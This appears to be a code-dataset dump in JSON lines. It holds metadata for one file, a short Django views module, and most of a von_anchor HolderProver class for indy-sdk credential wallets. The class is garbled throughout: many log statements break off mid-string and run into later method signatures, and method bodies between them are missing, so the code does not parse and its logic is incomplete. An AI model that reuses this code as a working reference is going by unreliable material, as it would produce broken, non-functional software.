"subprocess.check_output", "line_number": 71, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 73, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 75, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 86, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 87, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 89, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 112, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 115, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 119, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 121, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 122, "usage_type": "call"}, {"api_name": "configured_logger.logger.info", "line_number": 133, "usage_type": "call"}, {"api_name": "configured_logger.logger", "line_number": 133, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 134, "usage_type": "call"}, {"api_name": "typing.NamedTuple", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 157, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 162, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 168, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 171, "usage_type": "call"}]}
+{"seq_id": "36762020096", "text": "from django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom django.views.generic.base import TemplateView\n\nfrom braces.views import SetHeadlineMixin\n\nclass IndexView(SetHeadlineMixin, TemplateView):\n headline = 'Home Page'\n template_name = 'index.html'\n\n\ndef handler404(request):\n response = render_to_response('error/base.html', {'error_code': 404},\n context_instance=RequestContext(request))\n response.status_code = 404\n return response\n\n\ndef handler500(request):\n response = render_to_response('error/base.html', {'error_code': 500},\n context_instance=RequestContext(request))\n response.status_code = 500\n return response", "repo_name": "aaronlelevier/django-payasyougo", "sub_path": "payg/payg/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 706, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "braces.views.SetHeadlineMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.views.generic.base.TemplateView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 13, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 20, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "25292478842", "text": "import json\nimport logging\n\nfrom os import listdir, makedirs\nfrom os.path import basename, expanduser, isdir, isfile, join\nfrom time import time\nfrom typing import Set, Union\n\nfrom indy import anoncreds, ledger\nfrom indy.error import IndyError, ErrorCode\nfrom von_anchor.anchor.base import _BaseAnchor\nfrom von_anchor.cache import Caches, RevoCacheEntry, CRED_DEF_CACHE, REVO_CACHE, SCHEMA_CACHE\nfrom von_anchor.codec import canon_wql\nfrom von_anchor.error import (\n AbsentCred,\n AbsentCredDef,\n AbsentInterval,\n AbsentLinkSecret,\n AbsentRevReg,\n AbsentSchema,\n AbsentTails,\n BadIdentifier,\n BadRevStateTime,\n CacheIndex,\n ClosedPool,\n CredentialFocus)\nfrom von_anchor.nodepool import NodePool\nfrom von_anchor.tails import Tails\nfrom von_anchor.util import (\n cred_def_id2seq_no,\n ok_cred_def_id,\n ok_rev_reg_id,\n ok_schema_id,\n prune_creds_json,\n rev_reg_id2cred_def_id_tag)\nfrom von_anchor.validate_config import validate_config\nfrom von_anchor.wallet import Wallet\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass HolderProver(_BaseAnchor):\n \"\"\"\n Mixin for anchor acting in the role of w3c Holder and indy-sdk Prover. A Holder holds\n credentials; a Prover produces proof of credentials. Revocation support requires\n the holder-prover anchor to manage tails files.\n \"\"\"\n\n def __init__(self, wallet: Wallet, pool: NodePool, cfg: dict = None) -> None:\n \"\"\"\n Initializer for HolderProver anchor. Retain input parameters; do not open wallet nor tails writer.\n\n :param wallet: wallet for anchor use\n :param pool: pool for anchor use\n :param cfg: configuration dict for cache archive behaviour; e.g.,\n\n ::\n\n {\n 'parse-cache-on-open': True\n 'archive-cache-on-close': True,\n }\n\n \"\"\"\n\n LOGGER.debug('HolderProver.__init__ >>> wallet: %s, pool: %s, cfg: %s', wallet, pool, cfg)\n\n super().__init__(wallet, pool)\n self._link_secret = None\n\n self._dir_tails = join(expanduser('~'), '.indy_client', 'tails')\n makedirs(self._dir_tails, exist_ok=True)\n\n self._cfg = cfg or {}\n validate_config('holder-prover', self._cfg)\n\n self._dir_cache = join(expanduser('~'), '.indy_client', 'cache', self.wallet.name)\n makedirs(self._dir_cache, exist_ok=True)\n\n LOGGER.debug('HolderProver.__init__ <<<')\n\n def _assert_link_secret(self, action: str):\n \"\"\"\n Raise AbsentLinkSecret if link secret is not set.\n\n :param action: action requiring link secret\n \"\"\"\n\n if self._link_secret is None:\n LOGGER.debug('HolderProver._assert_link_secret: action %s requires link secret but it is not set', action)\n raise AbsentLinkSecret('Action {} requires link secret but it is not set'.format(action))\n\n @property\n def cfg(self) -> dict:\n \"\"\"\n Accessor for configuration dict\n\n :return: holder-prover config dict\n \"\"\"\n\n return self._cfg\n\n @cfg.setter\n def cfg(self, value: dict) -> None:\n \"\"\"\n Set configuration dict\n\n :param value: configuration dict\n \"\"\"\n\n self._cfg = value or {}\n validate_config('holder-prover', self._cfg)\n\n @property\n def dir_cache(self) -> str:\n \"\"\"\n Accessor for cache archive directory\n\n :return: holder-prover cache archive directory\n \"\"\"\n\n return self._dir_cache\n\n async def _sync_revoc(self, rr_id: str) -> None:\n \"\"\"\n Pick up tails file reader handle for input revocation registry identifier. If no symbolic\n link is present, get the revocation registry definition to retrieve its tails file hash,\n then find the tails file and link it.\n\n Raise AbsentTails for missing corresponding tails file.\n\n :param rr_id: revocation registry identifier\n \"\"\"\n\n LOGGER.debug('HolderProver._sync_revoc >>> rr_id: %s', rr_id)\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver._sync_revoc (str, int):\n \"\"\"\n Build rev reg delta json, potentially starting from existing (earlier) delta.\n\n Return delta json and its timestamp on the distributed ledger.\n\n Raise AbsentRevReg for no such revocation registry, or BadRevStateTime for a requested delta to\n a time preceding revocation registry creation.\n\n :param rr_id: rev reg id\n :param to: time (epoch seconds) of interest; upper-bounds returned timestamp\n :param fro: optional prior time of known delta json\n :param fro_delta: optional known delta as of time fro\n :return: rev reg delta json and ledger timestamp (epoch seconds)\n \"\"\"\n\n LOGGER.debug(\n '_HolderProver._build_rr_delta_json >>> rr_id: %s, to: %s, fro: %s, fro_delta: %s',\n rr_id,\n to,\n fro,\n fro_delta)\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver._build_rr_delta_json str:\n \"\"\"\n Build and return indy-sdk requested credentials json from input indy-sdk creds structure\n through specified filter.\n\n :param creds: indy-sdk creds structure or list of cred-briefs (cred-info + interval)\n :param filt: filter mapping cred def ids to:\n - (optionally) 'attr-match': dict mapping attributes to values (omit, empty dict, or None to match all);\n - (optionally) 'minima': (pred) integer lower-bounds of interest (omit, empty dict, or None to match all);\n omit parameter or specify empty dict or None for no filter, matching all; e.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'attr-match': {\n 'name': 'Alex',\n 'sex': 'M',\n 'favouriteDrink': None\n },\n 'minima': { # if both attr-match and minima present, combined conjunctively (i.e., via AND)\n 'favouriteNumber' : 10,\n 'score': 100 # if more than one minimum present, combined conjunctively (i.e., via AND)\n }\n },\n 'R17v42T4pk...:3:CL:19:0': {\n 'attr-match': {\n 'height': 175,\n 'birthdate': '1975-11-15' # combined conjunctively (i.e., via AND)\n }\n },\n 'Z9ccax812j...:3:CL:27:0': {\n 'attr-match': {} # match all attributes on this cred def\n },\n '9cHbp54C8n...:3:CL:37:0': {\n 'minima': { # request all attributes on this cred def, request preds specifying employees>=50\n 'employees' : 50,\n }\n }\n ...\n }\n\n :param filt_dflt_incl: whether to request (True) all creds by attribute/predicate\n that filter does not identify by cred def, or (False) to exclude them. Note that\n if the filter is None or {}, this parameter is unnecessary - it applies to a filter,\n not a non-filter.\n :return: indy_sdk requested_credentials json for use in proof creation\n \"\"\"\n\n LOGGER.debug('HolderProver.build_req_creds_json >>> creds: %s, filt: %s', creds, filt)\n\n req_creds = {\n 'self_attested_attributes': {},\n 'requested_attributes': {},\n 'requested_predicates': {}\n }\n\n def _add_brief(brief, uuid, req_creds_key):\n nonlocal req_creds\n req_creds[req_creds_key][uuid] = {\n 'cred_id': brief['cred_info']['referent'],\n 'revealed': True\n }\n if brief.get('interval', None):\n req_creds[req_creds_key][uuid]['timestamp'] = brief['interval']['to']\n if req_creds_key == 'requested_attributes':\n req_creds[req_creds_key][uuid]['revealed'] = True\n\n if filt:\n for cd_id in filt:\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.build_req_creds_json str:\n \"\"\"\n Return path to the correct directory for the tails file on input revocation registry identifier.\n\n :param rr_id: revocation registry identifier of interest\n :return: path to tails dir for input revocation registry identifier\n \"\"\"\n\n LOGGER.debug('HolderProver.dir_tails >>>')\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver.dir_tails 'HolderProver':\n \"\"\"\n Explicit entry. Perform ancestor opening operations,\n then parse cache from archive if so configured, and\n synchronize revocation registry to tails tree content.\n\n :return: current object\n \"\"\"\n\n LOGGER.debug('HolderProver.open >>>')\n\n await super().open()\n if self.cfg.get('parse-cache-on-open', False):\n Caches.parse(self.dir_cache)\n\n for path_rr_id in Tails.links(self._dir_tails):\n await self._sync_revoc(basename(path_rr_id))\n\n LOGGER.debug('HolderProver.open <<<')\n return self\n\n async def close(self) -> None:\n \"\"\"\n Explicit exit. If so configured, populate cache to prove all creds in\n wallet offline if need be, archive cache, and purge prior cache archives.\n\n :return: current object\n \"\"\"\n\n LOGGER.debug('HolderProver.close >>>')\n\n if self.cfg.get('archive-cache-on-close', False):\n await self.load_cache(True)\n Caches.purge_archives(self.dir_cache, True)\n\n await super().close()\n for path_rr_id in Tails.links(self._dir_tails):\n rr_id = basename(path_rr_id)\n try:\n await self._sync_revoc(rr_id)\n except ClosedPool:\n LOGGER.warning('HolderProver sync-revoc on close required ledger for %s but pool was closed', rr_id)\n\n LOGGER.debug('HolderProver.close <<<')\n\n async def rev_regs(self) -> list:\n \"\"\"\n Return list of revocation registry identifiers for which HolderProver has associated tails files.\n The operation creates associations for any (newly copied, via service wrapper API) tails files without.\n\n :return: list of revocation registry identifiers for which HolderProver has associated tails files\n \"\"\"\n\n LOGGER.debug('HolderProver.rev_regs >>>')\n\n for path_rr_id in Tails.links(self._dir_tails):\n await self._sync_revoc(basename(path_rr_id))\n\n rv = [basename(f) for f in Tails.links(self._dir_tails)]\n LOGGER.debug('HolderProver.rev_regs <<< %s', rv)\n return rv\n\n async def offline_intervals(self, cd_ids: list) -> dict:\n \"\"\"\n Return default non-revocation intervals for input cred def ids, based on content of revocation cache,\n for augmentation into specification for Verifier.build_proof_req_json. Note that the close() call\n to set the anchor off-line extends all revocation cache registry delta entries to its time of execution:\n in this case, the intervals will all be single timestamps rather than (to, fro) pairs.\n\n Raise CacheIndex if proof request cites credential definition without corresponding\n content in cred def cache or revocation cache.\n\n :param cd_ids: list of credential definition identifiers\n :return: dict mapping revocable cred def ids to interval specifications to augment into cd_id2spec\n parameter for Verifier.build_proof_req_json(), and non-revocable cred def ids to empty dict; e.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'interval': (1528111730, 1528115832)\n },\n 'R17v42T4pk...:3:CL:19:0': {},\n 'Z9ccax812j...:3:CL:27:0': {\n 'interval': (1528112408, 1528116008)\n },\n '9cHbp54C8n...:3:CL:37:0': {\n 'interval': 1528116426\n },\n '6caBcmLi33...:3:CL:41:0': {},\n ...\n }\n \"\"\"\n\n LOGGER.debug('HolderProver.offline_intervals >>> cd_ids: %s', cd_ids)\n\n rv = {}\n for cd_id in cd_ids:\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.offline_intervals None:\n \"\"\"\n Create link secret (a.k.a. master secret) used in proofs by HolderProver.\n\n Raise any IndyError causing failure to set link secret in wallet.\n\n :param link_secret: label for link secret; indy-sdk uses label to generate link secret\n \"\"\"\n\n LOGGER.debug('HolderProver.create_link_secret >>> link_secret: %s', link_secret)\n\n try:\n await anoncreds.prover_create_master_secret(self.wallet.handle, link_secret)\n except IndyError as x_indy:\n if x_indy.error_code == ErrorCode.AnoncredsMasterSecretDuplicateNameError:\n LOGGER.info('HolderProver did not create link secret - it already exists')\n else:\n LOGGER.debug(\n 'HolderProver.create_link_secret: (str, str):\n \"\"\"\n Create credential request as HolderProver and store in wallet; return credential json and metadata json.\n\n Raise AbsentLinkSecret if link secret not set.\n\n :param cred_offer_json: credential offer json\n :param cd_id: credential definition identifier\n :return: cred request json and corresponding metadata json as created and stored in wallet\n \"\"\"\n\n LOGGER.debug('HolderProver.create_cred_req >>> cred_offer_json: %s, cd_id: %s', cred_offer_json, cd_id)\n\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.create_cred_req str:\n \"\"\"\n Store cred in wallet as HolderProver, return its credential identifier as created in wallet.\n\n Raise AbsentTails if tails file not available for revocation registry for input credential.\n\n :param cred_json: credential json as HolderProver created\n :param cred_req_metadata_json: credential request metadata as HolderProver created via create_cred_req()\n :return: credential identifier within wallet\n \"\"\"\n\n LOGGER.debug(\n 'HolderProver.store_cred >>> cred_json: %s, cred_req_metadata_json: %s',\n cred_json,\n cred_req_metadata_json)\n\n cred = json.loads(cred_json)\n cred_def_json = await self.get_cred_def(cred['cred_def_id'])\n rr_id = cred['rev_reg_id']\n rrdef_json = None\n if rr_id:\n await self._sync_revoc(rr_id)\n rrdef_json = await self._get_rev_reg_def(rr_id)\n\n rv = await anoncreds.prover_store_credential(\n self.wallet.handle,\n None, # cred_id, let indy-sdk generate random uuid\n cred_req_metadata_json,\n cred_json,\n cred_def_json,\n rrdef_json)\n\n LOGGER.debug('HolderProver.store_cred <<< %s', rv)\n return rv\n\n async def load_cache(self, archive: bool = False) -> int:\n \"\"\"\n Load caches and archive enough to go offline and be able to generate proof\n on all credentials in wallet.\n\n Return timestamp (epoch seconds) of cache load event, also used as subdirectory\n for cache archives.\n\n :return: cache load event timestamp (epoch seconds)\n \"\"\"\n\n LOGGER.debug('HolderProver.load_cache >>> archive: %s', archive)\n\n rv = int(time())\n box_ids = json.loads(await self.get_box_ids_json())\n for s_id in box_ids['schema_id']:\n with SCHEMA_CACHE.lock:\n await self.get_schema(s_id)\n for cd_id in box_ids['cred_def_id']:\n with CRED_DEF_CACHE.lock:\n await self.get_cred_def(cd_id)\n for rr_id in box_ids['rev_reg_id']:\n await self._get_rev_reg_def(rr_id)\n with REVO_CACHE.lock:\n revo_cache_entry = REVO_CACHE.get(rr_id, None)\n if revo_cache_entry:\n try:\n await revo_cache_entry.get_delta_json(self._build_rr_delta_json, rv, rv)\n except ClosedPool:\n LOGGER.warning(\n 'Holder-Prover %s is offline from pool %s, cannot update revo cache reg delta for %s to %s',\n self.wallet.name,\n self.pool.name,\n rr_id,\n rv)\n\n if archive:\n Caches.archive(self.dir_cache)\n LOGGER.debug('HolderProver.load_cache <<< %s', rv)\n return rv\n\n async def get_box_ids_json(self) -> str:\n \"\"\"\n Return json object on lists of all unique box identifiers for credentials in wallet, as\n evidenced by tails directory content:\n * schema identifiers\n * credential definition identifiers\n * revocation registry identifiers.\n\n E.g.,\n\n ::\n\n {\n \"schema_id\": [\n \"R17v42T4pk...:2:tombstone:1.2\",\n \"9cHbp54C8n...:2:business:2.0\",\n ...\n ],\n \"cred_def_id\": [\n \"R17v42T4pk...:3:CL:19:0\",\n \"9cHbp54C8n...:3:CL:37:0\",\n ...\n ]\n \"rev_reg_id\": [\n \"R17v42T4pk...:4:R17v42T4pk...:3:CL:19:0:CL_ACCUM:0\",\n \"R17v42T4pk...:4:R17v42T4pk...:3:CL:19:0:CL_ACCUM:1\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:0\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:1\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:2\",\n ...\n ]\n }\n\n :return: tuple of sets for schema ids, cred def ids, rev reg ids\n \"\"\"\n\n LOGGER.debug('HolderProver.get_box_ids_json >>>')\n\n rr_ids = {basename(link) for link in Tails.links(self._dir_tails)}\n\n un_rr_ids = set()\n for rr_id in rr_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'rev_reg_id': rr_id}), 1)):\n un_rr_ids.add(rr_id)\n rr_ids -= un_rr_ids\n\n cd_ids = {cd_id for cd_id in listdir(self._dir_tails)\n if isdir(join(self._dir_tails, cd_id)) and ok_cred_def_id(cd_id)}\n s_ids = set()\n for cd_id in cd_ids:\n s_ids.add(json.loads(await self.get_schema(cred_def_id2seq_no(cd_id)))['id'])\n\n un_cd_ids = set()\n for cd_id in cd_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'cred_def_id': cd_id}), 1)):\n un_cd_ids.add(cd_id)\n cd_ids -= un_cd_ids\n\n un_s_ids = set()\n for s_id in s_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'schema_id': s_id}), 1)):\n un_s_ids.add(s_id)\n s_ids -= un_s_ids\n\n rv = json.dumps({\n 'schema_id': list(s_ids),\n 'cred_def_id': list(cd_ids),\n 'rev_reg_id': list(rr_ids)\n })\n LOGGER.debug('HolderProver.get_box_ids_json <<< %s', rv)\n return rv\n\n async def get_cred_infos_by_q(self, query_json: str, limit: int = None) -> str:\n \"\"\"\n Return list of cred-infos from wallet by input WQL query;\n return synopses of all credentials for no query.\n\n The operation supports a subset of WQL; i.e.,\n\n ::\n\n query = {subquery}\n subquery = {subquery, ..., subquery} - WHERE subquery AND ... AND subquery\n subquery = $or: [{subquery},..., {subquery}] - WHERE subquery OR ... OR subquery\n subquery = $not: {subquery} - Where NOT (subquery)\n subquery = \"tagName\": tagValue - WHERE tagName == tagValue\n subquery = \"tagName\": {$in: [tagValue, ..., tagValue]} - WHERE tagName IN (tagValue, ..., tagValue)\n subquery = \"tagName\": {$neq: tagValue} - WHERE tagName != tagValue\n\n but not\n\n ::\n\n subquery = \"tagName\": {$gt: tagValue} - WHERE tagName > tagValue\n subquery = \"tagName\": {$gte: tagValue} - WHERE tagName >= tagValue\n subquery = \"tagName\": {$lt: tagValue} - WHERE tagName < tagValue\n subquery = \"tagName\": {$lte: tagValue} - WHERE tagName <= tagValue\n subquery = \"tagName\": {$like: tagValue} - WHERE tagName LIKE tagValue\n\n :param query_json: WQL query json\n :param limit: maximum number of results to return\n\n :return: cred-infos as json list; i.e.,\n\n ::\n\n [\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n },\n ...\n ]\n\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_infos_by_query >>> query_json: %s, limit: %s', query_json, limit)\n\n infos = []\n if limit and limit < 0:\n limit = None\n\n (handle, cardinality) = await anoncreds.prover_search_credentials(\n self.wallet.handle,\n json.dumps(canon_wql(json.loads(query_json)))) # indy-sdk requires attr name canonicalization\n chunk = min(cardinality, limit or cardinality, Wallet.DEFAULT_CHUNK) # heuristic\n if limit:\n cardinality = min(limit, cardinality)\n try:\n while len(infos) != cardinality:\n batch = json.loads(await anoncreds.prover_fetch_credentials(handle, chunk))\n infos.extend(batch)\n if len(batch) < cardinality:\n break\n if len(infos) != cardinality:\n LOGGER.warning('Credential search/limit indicated %s results but fetched %s', cardinality, len(infos))\n finally:\n await anoncreds.prover_close_credentials_search(handle)\n\n rv_json = json.dumps(infos)\n LOGGER.debug('HolderProver.get_cred_infos_by_query <<< %s', rv_json)\n return rv_json\n\n async def get_cred_infos_by_filter(self, filt: dict = None) -> str:\n \"\"\"\n Return cred-info (list) from wallet by input filter for\n schema identifier and/or credential definition identifier components;\n return info of all credentials for no filter.\n\n :param filt: indy-sdk filter for credentials; i.e.,\n\n ::\n\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n }\n\n :return: credential infos as json list; i.e.,\n\n ::\n [\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n },\n ...\n ]\n\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_infos_by_filter >>> filt: %s', filt)\n\n rv_json = await anoncreds.prover_get_credentials(self.wallet.handle, json.dumps(filt or {}))\n LOGGER.debug('HolderProver.get_cred_infos_by_filter <<< %s', rv_json)\n return rv_json\n\n async def get_cred_info_by_id(self, cred_id: str) -> str:\n \"\"\"\n Return cred-info from wallet by wallet credential identifier.\n\n Raise AbsentCred for no such credential.\n\n :param cred_id: credential identifier of interest\n :return: json with cred for input credential identifier\n\n :return: cred-info json; i.e.,\n\n ::\n\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n }\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_info_by_id >>> cred_id: %s', cred_id)\n\n try:\n rv_json = await anoncreds.prover_get_credential(self.wallet.handle, cred_id)\n except IndyError as x_indy: # no such cred\n if x_indy.error_code == ErrorCode.WalletItemNotFound:\n LOGGER.debug(\n 'HolderProver.get_cred_info_by_id: (Set[str], str):\n \"\"\"\n Get credentials from HolderProver wallet corresponding to proof request and\n filter criteria; return credential identifiers from wallet and credentials json.\n Return empty set and empty production for no such credentials.\n\n This method is deprecated - prefer get_cred_briefs_by_proof_req_q() as it filters in-wallet.\n\n :param proof_req_json: proof request json as Verifier creates; has entries for proof request's\n nonce, name, and version; plus credential's requested attributes, requested predicates. I.e.,\n\n ::\n\n {\n 'nonce': string, # indy-sdk makes no semantic specification on this value\n 'name': string, # indy-sdk makes no semantic specification on this value\n 'version': numeric-string, # indy-sdk makes no semantic specification on this value\n 'requested_attributes': {\n '': { # aka attr_referent, a proof-request local identifier\n 'name': string, # attribute name (matches case- and space-insensitively)\n 'restrictions' [ # optional\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n },\n {\n ... # if more than one restriction given, combined disjunctively (i.e., via OR)\n }\n ],\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': int, # optional, epoch seconds\n 'to': int # optional, epoch seconds\n }\n },\n ...\n },\n 'requested_predicates': {\n '': { # aka predicate_referent, a proof-request local predicate identifier\n 'name': string, # attribute name (matches case- and space-insensitively)\n 'p_type': '>=',\n 'p_value': int, # predicate value\n 'restrictions': [ # optional\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n },\n {\n ... # if more than one restriction given, combined disjunctively (i.e., via OR)\n }\n ],\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': int, # optional, epoch seconds\n 'to': int # optional, epoch seconds\n }\n },\n ...\n },\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': Optional,\n 'to': Optional\n }\n }\n\n :param filt: filter for matching attribute-value pairs and predicates; dict mapping each\n cred def id to dict (specify empty dict or none for no filter, matching all)\n mapping attributes to values to match or compare. E.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'attr-match': {\n 'name': 'Alex',\n 'sex': 'M',\n 'favouriteDrink': None\n },\n 'minima': { # if both attr-match and minima present, combined conjunctively (i.e., via AND)\n 'favouriteNumber' : 10,\n 'score': '100' # nicety: implementation converts to int for caller\n },\n },\n 'R17v42T4pk...:3:CL:19:0': {\n 'attr-match': {\n 'height': 175,\n 'birthdate': '1975-11-15' # combined conjunctively (i.e., via AND)\n }\n },\n 'Z9ccax812j...:3:CL:27:0': {\n 'attr-match': {} # match all attributes on this cred def\n }\n ...\n }\n\n :param filt_dflt_incl: whether to include (True) all credentials from wallet that filter does not\n identify by cred def, or to exclude (False) all such credentials\n :return: tuple with (set of referents, creds json for input proof request);\n empty set and empty production for no such credential\n \"\"\"\n\n LOGGER.debug('HolderProver.get_creds >>> proof_req_json: %s, filt: %s', proof_req_json, filt)\n\n if filt is None:\n filt = {}\n rv = None\n creds_json = await anoncreds.prover_get_credentials_for_proof_req(self.wallet.handle, proof_req_json)\n creds = json.loads(creds_json)\n cred_ids = set()\n\n if filt:\n for cd_id in filt:\n try:\n json.loads(await self.get_cred_def(cd_id))\n except AbsentCredDef:\n LOGGER.warning('HolderProver.get_creds: ignoring filter criterion, no cred def on %s', cd_id)\n filt.pop(cd_id)\n\n for briefs in {**creds['attrs'], **creds['predicates']}.values():\n for brief in briefs: # brief is a dict in a list of dicts\n cred_info = brief['cred_info']\n if filt:\n cred_cd_id = cred_info['cred_def_id']\n if cred_cd_id not in filt:\n if filt_dflt_incl:\n cred_ids.add(cred_info['referent'])\n continue\n if 'attr-match' in (filt[cred_cd_id] or {}): # maybe filt[cred_cd_id]: None\n if not {k: str(filt[cred_cd_id].get('attr-match', {})[k])\n for k in filt[cred_cd_id].get('attr-match', {})}.items() <= cred_info['attrs'].items():\n continue\n if 'minima' in (filt[cred_cd_id] or {}): # maybe filt[cred_cd_id]: None\n minima = filt[cred_cd_id].get('minima', {})\n try:\n if any((attr not in cred_info['attrs'])\n or (int(cred_info['attrs'][attr]) < int(minima[attr]))\n for attr in minima):\n continue\n except ValueError:\n continue # int conversion failed - reject candidate\n cred_ids.add(cred_info['referent'])\n else:\n cred_ids.add(cred_info['referent'])\n\n if filt:\n creds = json.loads(prune_creds_json(creds, cred_ids))\n\n rv = (cred_ids, json.dumps(creds))\n LOGGER.debug('HolderProver.get_creds <<< %s', rv)\n return rv\n\n async def get_cred_briefs_by_proof_req_q(\n self,\n proof_req_json: str,\n x_queries_json: str = None) -> (Set[str], str):\n \"\"\"\n Return cred-briefs from wallet by proof request and WQL queries by\n proof request referent. Return no cred-briefs no WQL query - util.proof_req2wql_all()\n builds WQL to retrieve all cred-briefs for some or all cred-def-ids in a proof request.\n\n For each WQL query on an item referent, indy-sdk takes the WQL and the attribute name\n and restrictions (e.g., cred def id, schema id, etc.) from its referent. Note that\n util.proof_req_attr_referents() maps cred defs and attr names to proof req item referents,\n bridging the gap between attribute names and their corresponding item referents.\n\n :param proof_req_json: proof request as per get_creds(); e.g.,\n\n ::\n\n {\n \"nonce\": \"1532429687\",\n \"name\": \"proof_req\",\n \"version\": \"0.0\",\n \"requested_predicates\": {},\n \"requested_attributes\": {\n \"17_name_uuid\": {\n \"restrictions\": [\n {\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n ],\n \"name\": \"name\"\n },\n \"17_thing_uuid\": {\n \"restrictions\": [\n {\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n ],\n \"name\": \"thing\"\n }\n }\n }\n\n :param x_queries_json: json list of extra queries to apply to proof request attribute and predicate\n referents; e.g.,\n\n ::\n {\n \"17_thing_uuid\": { # require attr presence on name 'thing', cred def id from proof req above\n \"$or\": [\n {\n \"attr::name::value\": \"J.R. 'Bob' Dobbs\"\n },\n {\n \"attr::thing::value\": \"slack\"\n },\n ]\n },\n }\n\n :return: tuple with set of wallet cred ids, json list of cred briefs;\n e.g.,\n\n ::\n (\n {\n 'b42ce5bc-b690-43cd-9493-6fe86ad25e85',\n 'd773434a-0080-4e3e-a03b-f2033eae7d75'\n },\n '[\n {\n \"interval\": null,\n \"cred_info\": {\n \"schema_id\": \"LjgpST2rjsoxYegQDRm7EL:2:non-revo:1.0\",\n \"rev_reg_id\": null,\n \"attrs\": {\n \"name\": \"Chicken Hawk\",\n \"thing\": \"chicken\"\n },\n \"cred_rev_id\": null,\n \"referent\": \"d773434a-0080-4e3e-a03b-f2033eae7d75\",\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n },\n {\n \"interval\": null,\n \"cred_info\": {\n \"schema_id\": \"LjgpST2rjsoxYegQDRm7EL:2:non-revo:1.0\",\n \"rev_reg_id\": null,\n \"attrs\": {\n \"name\": \"J.R. \\\"Bob\\\" Dobbs\",\n \"thing\": \"slack\"\n },\n \"cred_rev_id\": 